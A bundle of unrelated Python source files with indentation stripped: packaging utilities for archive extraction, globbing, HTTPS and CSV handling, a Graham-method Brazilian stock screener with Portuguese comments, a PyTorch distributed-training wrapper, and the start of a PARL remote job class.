mode = 'r:gz'
elif archive_filename.endswith(('.tar.bz2', '.tbz')):
format = 'tbz'
mode = 'r:bz2'
elif archive_filename.endswith('.tar'):
format = 'tar'
mode = 'r'
else:
raise ValueError('Unknown format for %r' % archive_filename)
try:
if format == 'zip':
archive = ZipFile(archive_filename, 'r')
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != 'zip' and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode('utf-8')
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G','T','P')
class Progress(object):
unknown = 'UNKNOWN'
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = '100 %'
elif self.max is None:
result = ' ?? %'
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = '%3d %%' % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = '??:??:??'
#elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime('%H:%M:%S', time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = 'Done'
t = self.elapsed
#import pdb; pdb.set_trace()
else:
prefix = 'ETA '
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
#import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return '%s: %s' % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return '%d %sB/s' % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, '_tunnel_host', False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, 'SSLContext'):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs)
else:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, 'HAS_SNI', False):
kwargs['server_hostname'] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug('Host verified: %s', self.host)
except CertificateError:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if 'certificate verify failed' in str(e.reason):
raise CertificateError('Unable to verify server certificate '
'for %s' % req.host)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError('Unexpected HTTP request on what should be a secure '
'connection: %s' % req)
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class HTTPS(httplib.HTTPS):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs['timeout'] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None,
**kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop('timeout', None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get('use_datetime', 0)
if scheme == 'https':
tcls = SafeTransport
else:
tcls = Transport
kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
'delimiter': str(','), # The strs are used because we need native
'quotechar': str('"'), # str in the csv API (2.x won't take
'lineterminator': str('\n') # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if 'stream' in kwargs:
stream = kwargs['stream']
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs['path'], 'r')
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode('utf-8')
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, 'w')
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode('utf-8')
r.append(item)
row = r
self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters['inc'] = 'inc_convert'
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if '()' in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop('()')
if not callable(c):
c = self.resolve(c)
props = config.pop('.', None)
# Check for valid identifiers
args = config.pop('[]', ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and '()' in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, 'r', encoding='utf-8') as f:
result = json.load(f)
return result
#
# Mixin for running subprocesses and capturing their output
#
class SubprocessMixin(object):
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write('.')
else:
sys.stderr.write(s.decode('utf-8'))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, **kwargs)
t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout'))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr'))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress('done.', 'main')
elif self.verbose:
sys.stderr.write('done.\n')
return p
|
graham_valuation.py
|
#!/usr/bin/env python3
# Princípios utilizados:
# - [x] 1. Sobrevivência: Sobreviveu nos últimos 10 anos. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
# - [x] 2. Estabilidade ds Lucros: Lucro > 0 nos últimos 10 anos. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
# - [x] 3. Crescimento dos Lucros: Lucros crescentes nos últimos 10 anos https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
# - [x] 4. Crescimento dos Lucro Por Ação: LPA atual > 1.33 * LPA 10 anos atrás. (Calculado através da média dos 3 anos do começo e dos 3 anos do fim deste período) http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# - [x] 5. Estabilidade dos Dividendos: Dividendos pagos nos últimos 10 anos. http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# - [x] 6. raíz_quadrada_de(22.5 * VPA * LPA) => Quanto maior, melhor. Ideal > 1.5 * Preço. https://www.sunoresearch.com.br/artigos/valor-intrinseco/?utm_source=PR&utm_medium=artigo&utm_campaign=investing_05122019
# - [x] 7. P/L (Preço/Lucro) => Quanto menor, melhor (ideal, < 15 E >= 0) http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# - [x] 8. P/VP (Preço/Valor Patrimonial) => Quanto menor, melhor (ideal, < 1.5 E >= 0) http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# - [x] 9. Crescimento em 5 anos => Quanto maior, melhor (ideal, > 5%) https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# - [x] 10. ROE (Return On Equity) => Quanto maior, melhor (ideal, superior a 20%) https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# - [x] 11. Dividend Yield (Rendimento de Dividendo) => Quanto maior, melhor (ideal, > Taxa Selic (4.5%)) https://foconomilhao.com/acoes-com-dividend-yield-maior-que-a-selic/
# - [x] 12. Liquidez Corrente => Quanto maior, melhor (ideal > 1.5) https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# - [x] 13. Dívida Bruta/Patrimônio => Quanto menor, melhor (ideal < 50%) https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# - [x] 14. Patrimônio Líquido => Quanto maior, melhor (ideal > 2000000000)
#### Graham ####
# ===== Próximos =====
# * Valor de Mercado maior que 2.000.000 . # Benjamin Graham # https://edisciplinas.usp.br/pluginfile.php/3821144/mod_resource/content/4/245.pdf
# => https://www.fundamentus.com.br/detalhes.php?papel=PETR4
# * Valor médio de negociações superior a R$ 1 milhão. # Benjamin Graham # https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# ~> Vol $ méd (2m) > 1.000.000
# => https://www.fundamentus.com.br/detalhes.php?papel=PETR4
# * Endividamento de longo prazo < Capital de Giro # Benjamin Graham # https://www.sunoresearch.com.br/artigos/o-investidor-inteligente-entenda-a-obra-de-benjamin-graham/
# * Possui bom nível de governança corporativa # Benjamin Graham # https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# Lucros para fazer o Gráfico ;)
# https://api-analitica.sunoresearch.com.br/api/Statement/GetStatementResultsReportByTicker?type=y&ticker=WEGE3&period=10
import sys, os
sys.path.extend([f'./{name}' for name in os.listdir(".") if os.path.isdir(name)])
import fundamentus
import bovespa
import backtest
import browser
import pandas
import numpy
import re
from math import sqrt
from decimal import Decimal
import http.cookiejar
import urllib.request
import json
import threading
import time
import pyperclip
# Populate shares panda dataframe with the provided year
def populate_shares(year):
globals()['year'] = year
globals()['infos'] = {}
if year == current_year():
shares = bovespa.shares()
else:
shares = fundamentus.shares(year)
shares = shares[shares['Cotação'] > 0]
shares = shares[shares['Liquidez 2 meses'] > 0]
shares['Ranking (Graham)'] = 0
fill_infos(shares)
shares = add_ratings(shares)
shares = reorder_columns(shares)
return shares
# infos = {
# 'TRPL4': {
# "survivability": True/False, # Empresa com no mínimo 10 anos de sobrevivência (Graham olhava lucros e dividendos dos últimos 10 anos) # Benjamin Graham. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
# "earnings_stability": True/False, # Estabilidade de lucros: Lucro > 0 nos últimos 10 anos # Benjamin Graham. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
# "earnings_growth": True/False, # Crescimento dos lucros: Lucros crescentes nos últimos 10 anos # Benjamin Graham. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
# "lpa_growth": True/False, # LPA atual > 1.33 * LPA 10 anos atrás. # Benjamin Graham. (calculado através da média dos 3 anos do começo e dos 3 anos do fim deste período) # http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# "dividends_stability": True/False, # Dividendos pagos nos últimos 10 anos. # Benjamin Graham # http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# }
# }
def fill_infos(shares):
cookie_jar = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))
opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201'),
('Accept', 'text/html, text/plain, text/css, text/sgml, */*;q=0.01')]
tickers = list(shares.index)
threads = [threading.Thread(target=fill_infos_by_ticker, args=(ticker,opener,)) for ticker in tickers]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def fill_infos_by_ticker(ticker, opener):
infos[ticker] = {
'survivability': False,
'earnings_stability': False,
'earnings_growth': False,
'lpa_growth': False,
'dividends_stability': False
}
# Fetching Lucro Liquido
url = f'https://api-analitica.sunoresearch.com.br/api/Statement/GetStatementResultsReportByTicker?type=y&ticker={ticker}&period=999'
with opener.open(url) as link:
company_results = link.read().decode('ISO-8859-1')
company_results = json.loads(company_results)
current_year = year
lucros = [r for r in company_results if r['description'] == 'Lucro LÃ\xadquido'][0]
years = [x for x in lucros.keys() if re.match('C_\w{4}$', x)]
if(len(years) == 0):
return
years = [x for x in years if int(re.findall('C_(\w{4})$', x)[0]) < current_year]
list.sort(years)
lucros = { year: lucros[year] for year in years }
ultimos_lucros = list(lucros.values())[-10:]
# Ugly Fix for missing data :( Looks like the API have missing data -_-
# Fill None values with the Mean earning
present_lucros = [i for i in ultimos_lucros if i]
if (len(present_lucros) == 0):
mean = 0
else:
mean = sum(present_lucros) / len(present_lucros)
ultimos_lucros = [mean if v is None else v for v in ultimos_lucros]
# End of Ugly Fix
infos[ticker]['survivability'] = f'C_{current_year - 10}' in lucros.keys()
infos[ticker]['earnings_stability'] = all(ultimos_lucros[i] > 0 for i in range(len(ultimos_lucros)))
infos[ticker]['earnings_growth'] = all(ultimos_lucros[i] <= ultimos_lucros[i+1] for i in range(len(ultimos_lucros)-1)) # Isso aqui deve virar uma função e devemos ver a tendência dessa função!
# Fetching LPA's and DPA's
url = f'https://api-analitica.sunoresearch.com.br/api/Indicator/GetIndicatorsYear?ticker={ticker}'
with opener.open(url) as link:
company_indicators = link.read().decode('ISO-8859-1')
company_indicators = json.loads(company_indicators)
# Only consider company indicators before the current_year (robust solution for backtesting purposes)
company_indicators = [ci for ci in company_indicators if ci['year'] < current_year]
last_dpas = [fundament['dpa'] for fundament in company_indicators]
last_lpas = [fundament['lpa'] for fundament in company_indicators]
if (len(last_lpas[:10]) > 0):
infos[ticker]['lpa_growth'] = (sum(last_lpas[:3]) / 3) >= (sum(last_lpas[-3:]) / 3)
if (len(last_dpas[:10]) > 0):
infos[ticker]['dividends_stability'] = all(last_dpas[:10][i] > 0 for i in range(len(last_dpas[:10])))
def add_ratings(shares):
add_graham_columns(shares)
fill_fair_price(shares)
fill_score(shares)
fill_score_explanation(shares)
return fill_special_infos(shares)
# Inicializa os índices
def add_graham_columns(shares):
shares['Preço Justo (Graham)'] = 0
shares['Graham Score'] = 0
shares['Preço Justo (Graham) / Cotação'] = 0
shares['10 Anos de Sobrevivencia'] = False
shares['Lucros Positivos nos Ultimos 10 Anos'] = False
shares['Lucros Crescentes nos Ultimos 10 Anos'] = False
shares['LPA atual > 1.33 * LPA 10 anos atrás'] = False
shares['Dividendos Positivos nos Ultimos 10 Anos'] = False
# Benjamin Graham elaborou a seguinte fórmula para calcular o Valor Intríseco (Preço Justo (Graham)):
# => sqrt(22.5 * VPA * LPA)
def fill_fair_price(shares):
for index in range(len(shares)):
if ((shares['P/L'][index] > 0) & (shares['P/VP'][index] > 0)):
shares['Preço Justo (Graham)'][index] = sqrt(Decimal(22.5) * (shares['Cotação'][index] / shares['P/L'][index]) * (shares['Cotação'][index] / shares['P/VP'][index]))
else:
shares['Preço Justo (Graham)'][index] = 0
shares['Preço Justo (Graham) / Cotação'] = shares['Preço Justo (Graham)'] / shares['Cotação'] # Ideal > 1. Quanto maior, melhor! Significa que a ação deveria estar valendo 1 vezes mais, 2 vezes mais, 3 vezes mais, etc.
def fill_score(shares):
shares['Graham Score'] += (shares['Preço Justo (Graham) / Cotação'] > Decimal(1.5)).astype(int)
shares['Graham Score'] += ((shares['P/L'] < 15) & (shares['P/L'] >= 0)).astype(int)
shares['Graham Score'] += ((shares['P/VP'] < 1.5) & (shares['P/VP'] >= 0)).astype(int)
shares['Graham Score'] += (shares['Crescimento em 5 anos'] > 0.05).astype(int)
shares['Graham Score'] += (shares['ROE'] > 0.2).astype(int)
shares['Graham Score'] += (shares['Dividend Yield'] > 0.045).astype(int)
shares['Graham Score'] += (shares['Liquidez Corrente'] > 1.5).astype(int)
shares['Graham Score'] += (shares['Dívida Bruta/Patrimônio'] < 0.5).astype(int)
shares['Graham Score'] += (shares['Patrimônio Líquido'] > 2000000000).astype(int)
# Mostra quais filtros a ação passou para pontuar seu Score
def fill_score_explanation(shares):
shares['Margem de Segurança: Preço Justo (Graham) > 1.5 * Cotação'] = shares['Preço Justo (Graham) / Cotação'] > Decimal(1.5)
shares['P/L < 15 (E não negativo)'] = (shares['P/L'] < 15) & (shares['P/L'] >= 0)
shares['P/VP < 1.5 (E não negativo)'] = (shares['P/VP'] < 1.5) & (shares['P/VP'] >= 0)
shares['Crescimento em 5 anos > 0.05'] = shares['Crescimento em 5 anos'] > 0.05
shares['ROE > 20%'] = shares['ROE'] > 0.2
shares['Dividend Yield > 0.045 (Taxa Selic)'] = shares['Dividend Yield'] > 0.045
shares['Liquidez Corrente > 1.5'] = shares['Liquidez Corrente'] > 1.5
shares['Dívida Bruta/Patrimônio < 0.5'] = shares['Dívida Bruta/Patrimônio'] < 0.5
shares['Patrimônio Líquido > 2 Bilhões'] = shares['Patrimônio Líquido'] > 2000000000
def fill_special_infos(shares):
for index in range(len(shares)):
ticker = shares.index[index]
shares['Graham Score'][index] += int(infos[ticker]['survivability'])
shares['10 Anos de Sobrevivencia'][index] = infos[ticker]['survivability']
shares['Graham Score'][index] += int(infos[ticker]['earnings_stability'])
shares['Lucros Positivos nos Ultimos 10 Anos'][index] = infos[ticker]['earnings_stability']
shares['Graham Score'][index] += int(infos[ticker]['earnings_growth'])
shares['Lucros Crescentes nos Ultimos 10 Anos'][index] = infos[ticker]['earnings_growth']
shares['Graham Score'][index] += int(infos[ticker]['lpa_growth'])
shares['LPA atual > 1.33 * LPA 10 anos atrás'][index] = infos[ticker]['lpa_growth']
shares['Graham Score'][index] += int(infos[ticker]['dividends_stability'])
shares['Dividendos Positivos nos Ultimos 10 Anos'][index] = infos[ticker]['dividends_stability']
return shares
# Reordena a tabela para mostrar a Cotação, o Valor Intríseco e o Graham Score como primeiras colunass
def reorder_columns(shares):
columns = ['Ranking (Graham)', 'Cotação', 'Preço Justo (Graham)', 'Graham Score', 'Preço Justo (Graham) / Cotação', 'Setor', 'Subsetor', 'Segmento']
return shares[columns + [col for col in shares.columns if col not in tuple(columns)]]
# Get the current_year integer value, for example: 2020
def current_year():
return int(time.strftime("%Y"))
# python3 graham_valuation.py "{ 'year': 2015 }"
if __name__ == '__main__':
year = current_year()
if len(sys.argv) > 1:
year = int(eval(sys.argv[1])['year'])
shares = populate_shares(year)
shares.sort_values(by=['Preço Justo (Graham) / Cotação', 'Graham Score'], ascending=[False, False], inplace=True)
shares = shares[shares['Graham Score'] >= 8]
shares['Ranking (Graham)'] = range(1, len(shares) + 1)
print(shares)
pyperclip.copy(shares.to_markdown())
if year != current_year():
backtest.run_all(fundamentus.start_date(year), list(shares.index[:20]))
|
multiverse_pt.py
|
#!/usr/bin/env python
'''
engine_mx
Created by Seria at 12/02/2019 3:45 PM
Email: zzqsummerai@yeah.net
_ooOoo_
o888888888o
o88`_ . _`88o
(| 0 0 |)
O \ 。 / O
_____/`-----‘\_____
.’ \|| _ _ ||/ `.
| _ ||| | ||| _ |
| | \\ // | |
| | \-----/ | |
\ .\ ___/- -\___ /. /
,--- / ___\<|>/___ \ ---,
| |: \ \ / / :| |
`\--\_ -. ___ .- _/--/‘
=========== \__ NOBUG __/ ===========
'''
# -*- coding:utf-8 -*-
import torch
import os
import multiprocessing as mp
from types import MethodType
from nebulae.toolkit.utility import ver2num
if ver2num(torch.__version__) >= ver2num('1.6.0'):
is_new_version = True
else:
is_new_version = False
if is_new_version:
class DDP(torch.nn.parallel.DistributedDataParallel):
def __init__(self, module, device_ids, output_device):
super(DDP, self).__init__(module, device_ids=device_ids, output_device=output_device)
def __getattr__(self, name: str):
if '_parameters' in self.__dict__:
_parameters = self.__dict__['_parameters']
if name in _parameters:
return _parameters[name]
if '_buffers' in self.__dict__:
_buffers = self.__dict__['_buffers']
if name in _buffers:
return _buffers[name]
if '_modules' in self.__dict__:
modules = self.__dict__['_modules']
if name in modules:
return modules[name]
if hasattr(self, 'module'):
if hasattr(self.module, name):
return getattr(self.module, name)
raise AttributeError("'{}' object has no attribute '{}'".format(type(self).__name__, name))
else:
from apex import parallel
class DDP(parallel.DistributedDataParallel):
def __init__(self, module, delay_allreduce):
super(DDP, self).__init__(module, delay_allreduce=delay_allreduce)
def __getattr__(self, name: str):
if '_parameters' in self.__dict__:
_parameters = self.__dict__['_parameters']
if name in _parameters:
return _parameters[name]
if '_buffers' in self.__dict__:
_buffers = self.__dict__['_buffers']
if name in _buffers:
return _buffers[name]
if '_modules' in self.__dict__:
modules = self.__dict__['_modules']
if name in modules:
return modules[name]
if hasattr(self, 'module'):
if hasattr(self.module, name):
return getattr(self.module, name)
raise AttributeError("'{}' object has no attribute '{}'".format(type(self).__name__, name))
# DDP = parallel.DistributedDataParallel
class Multiverse(object):
'''
Args:
nworld: world size
'''
def __init__(self, universe, nworld=1):
self.universe = universe
self.nworld = nworld
self.rank = -1
self.env = os.environ.copy()
self.env["MASTER_ADDR"] = '127.0.0.1'
self.env["MASTER_PORT"] = '29500'
self.env["WORLD_SIZE"] = str(nworld)
self.env["OMP_NUM_THREADS"] = '1'
def __call__(self):
# mp.set_start_method('spawn')
ps = []
for r in range(self.nworld):
self.rank = r
self.env['RANK'] = str(r)
self.env['LOCAL_RANK'] = str(r)
p = mp.Process(target=self.universe, args=(self,))
p.start()
ps.append(p)
for p in ps:
p.join()
def init(self):
for k, v in self.env.items():
os.environ[k] = v
def scope(self):
class _VirtualScope():
def __init__(self):
pass
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
return _VirtualScope()
def Executor(self, func):
def _execWrapper(*args, **kwargs):
return func(*args, **kwargs)
return _execWrapper
def _sync(self, model):
scope = model.scope
if is_new_version:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)
model = model.to(torch.device('cuda:%d' % self.rank))
model = DDP(model, device_ids=[self.rank], output_device=self.rank)
else:
model = parallel.convert_syncbn_model(model)
model = model.to(torch.device('cuda:%d' % self.rank))
model = DDP(model, delay_allreduce=True)
def gear(self, gr):
if isinstance(gr, bool):
if gr:
self.train()
else:
self.eval()
else:
raise Exception('NEBULAE ERROR ⨷ %s is not a valid type of collected gear.' % type(gr))
model.gear = MethodType(gear, model)
model.scope = scope
return model
def sync(self, models, data):
if not isinstance(models, (list, tuple)):
models = (models,)
if not isinstance(data, (list, tuple)):
data = (data,)
synced_md = []
for m in models:
synced_md.append(self._sync(m))
return tuple(synced_md) + tuple(data)
def reduce(self, tensor, aggregate=False):
rt = tensor.clone()
torch.distributed.all_reduce(rt, op=torch.distributed.ReduceOp.SUM)
if not aggregate:
rt /= self.nworld
return rt
|
job.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
os.environ['CUDA_VISIBLE_DEVICES'] = ''
os.environ['XPARL'] = 'True'
import argparse
import cloudpickle
import pickle
import psutil
import re
import sys
import tempfile
import threading
import time
import traceback
import zmq
from parl.utils import to_str, to_byte, get_ip_address, logger
from parl.utils.communication import loads_argument, loads_return,\
dumps_argument, dumps_return
from parl.remote import remote_constants
from parl.utils.exceptions import SerializeError, DeserializeError
from parl.remote.message import InitializedJob
class Job(object):
"""Base class for the job.
After establishing connection with the remote object, the job will
create a remote class instance locally and enter an infinite loop,
waiting for commands from the remote object.
"""
def __init__(self, worker_address):
"""
Args:
worker_address(str): worker_address for sending job information(e.g, pid)
Attributes:
pid (int): Job process ID.
max_memory (float): Maximum memory (MB) can be used by each remote instance.
"""
self.job_is_alive = True
